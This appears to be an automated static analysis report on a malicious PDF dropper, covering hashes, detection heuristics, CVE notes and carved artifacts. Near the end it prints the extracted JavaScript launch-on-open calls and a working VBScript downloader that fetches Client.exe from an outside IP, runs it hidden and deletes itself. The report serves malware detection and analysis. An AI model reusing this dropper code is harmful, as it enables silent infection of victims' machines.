Malicious PDF — malware analysis report

Static analysis result for SHA-256 584736cbc92f1c59…

MALICIOUS

PDF

485.6 KB Created: 2021-10-28 09:46:45 +05:30 First seen: 2021-11-07
MD5: cd50da2e2895db0725fc154c88025654 SHA-1: 042a5b75b51a13ba1d8e5632d5d3b2e74f8d05ee SHA-256: 584736cbc92f1c59da17b08e2280ad97f318e221085dc0d11c1c53b27abaec79
396 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1105 Ingress Tool Transfer

This PDF file exploits a known vulnerability (CVE-2023-26369 related) to execute embedded JavaScript. The JavaScript then downloads and saves a second-stage payload named 'Client.exe' from 'http://3.12.41.114/Client.exe' to the user's public directory and executes it. The embedded script also attempts to delete itself after execution.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9991

Heuristics 10

  • TrueType bitmap font + active content — CVE-2023-26369 related high CVE related PDF_CVE_2023_26369_RELATED
    PDF embeds a TrueType font with bitmap tables (EBDT/sbix/CBDT) alongside exploit delivery indicators — CVE-2023-26369 exploits the sfac_GetSbitBitmap function in Adobe's libCoolType for arbitrary code execution. This CVE was actively exploited in the wild, but this rule does not validate the malformed EBLC/EBDT primitive.
  • ClamAV: Win.Trojan.Generic-9916874-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Generic-9916874-0
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • exportDataObject + nLaunch — embedded-file launch-on-open dropper critical PDF_JS_EXPORT_LAUNCH_DROPPER
    PDF JavaScript calls exportDataObject() with nLaunch set, which extracts the document's embedded file and launches it in its default application. This is a launch-on-open dropper: the embedded file is the payload. No benign workflow auto-launches an extracted PDF attachment.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.excel-dna.net/addin/2018/05/dnalibrary In PDF document text
    • http://3.12.41.114/Client.exeIn PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://www.w3.org/2001/XMLSchema-instanceIn PDF document text
    • http://www.w3.org/2001/XMLSchemaIn PDF document text
    • https://docs.microsoft.com/typography/abouthttp://lucasfonts.comMicrosoftIn PDF document text
    • http://en.wikipedia.org/wiki/MIT_LicenseIn PDF document text
    • http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0XIn PDF document text
    • http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0In PDF document text
    • http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl0aIn PDF document text
    • http://www.microsoft.com/pkiops/certs/MicCodSigPCA2011_2011-07-08.crt0In PDF document text
    • http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0TIn PDF document text
    • http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0In PDF document text
    • http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl0^In PDF document text
    • http://www.microsoft.com/pki/certs/MicRooCerAut2011_2011_03_22.crt0��In PDF document text
    • http://www.microsoft.com/pkiops/docs/primarycps.htm0@In PDF document text
    • http://www.microsoft.com/TypographyIn PDF document text

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0002_000.js pdf-javascript-stream PDF /JS object 2 at offset 0xF 124 bytes
SHA-256: bcac8109eb29826f54e574b800a732ad77e85e25e51d352d66393fdf50fd7881
Preview script
First 1,000 lines of the extracted script
this.exportDataObject({ cName: "Invoice.vbs", nLaunch: 2 });
this.exportDataObject({ cName: "Quotation.xll", nLaunch: 2 });
stream_001_off000010b0.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x10B0 566784 bytes
SHA-256: 92f3eaf93a1f5906edf08a888a1c35488bfda23acd68985027e16fa0300795a6
Detection
ClamAV: Win.Trojan.Generic-9916874-0
Obfuscation or payload: likely
actual_type=PE; declared_or_context_type=PDF; filename=stream_001_off000010b0.bin; kind=decompressed-pdf-stream Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS_X64, SC_STR_LOADLIBRARY Static shellcode analysis recovered API/import strings: LoadLibraryW, GetProcAddress
stream_003_off000499b5.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x499B5 570020 bytes
SHA-256: f8e3cfcc65e6efccfe56fe99a19031fe2cee69336756fa45331ac79d59d2dbe8
embedded_pdf_script_00000ea6.bin pdf-embedded-script PDF decompressed stream script payload at offset 0xEA6 523 bytes
SHA-256: 79255346b130eb7d9661f540937f48bd837d9bc41d00f2afe25310d9d060338f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 shell/COM execution token(s).
Preview script
First 1,000 lines of the extracted script
dim pOut, xHttp, bStrm
pOut = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\\Client.exe"
Set xHttp = CreateObject("Microsoft.XMLHTTP")
Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://3.12.41.114/Client.exe", False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile pOut, 2
end with
CreateObject("Wscript.Shell").Run """" & pOut & """", 0, False
CreateObject("Scripting.FileSystemObject").DeleteFile WScript.ScriptFullName

Open this report in the interactive analyzer, or submit your own file for analysis.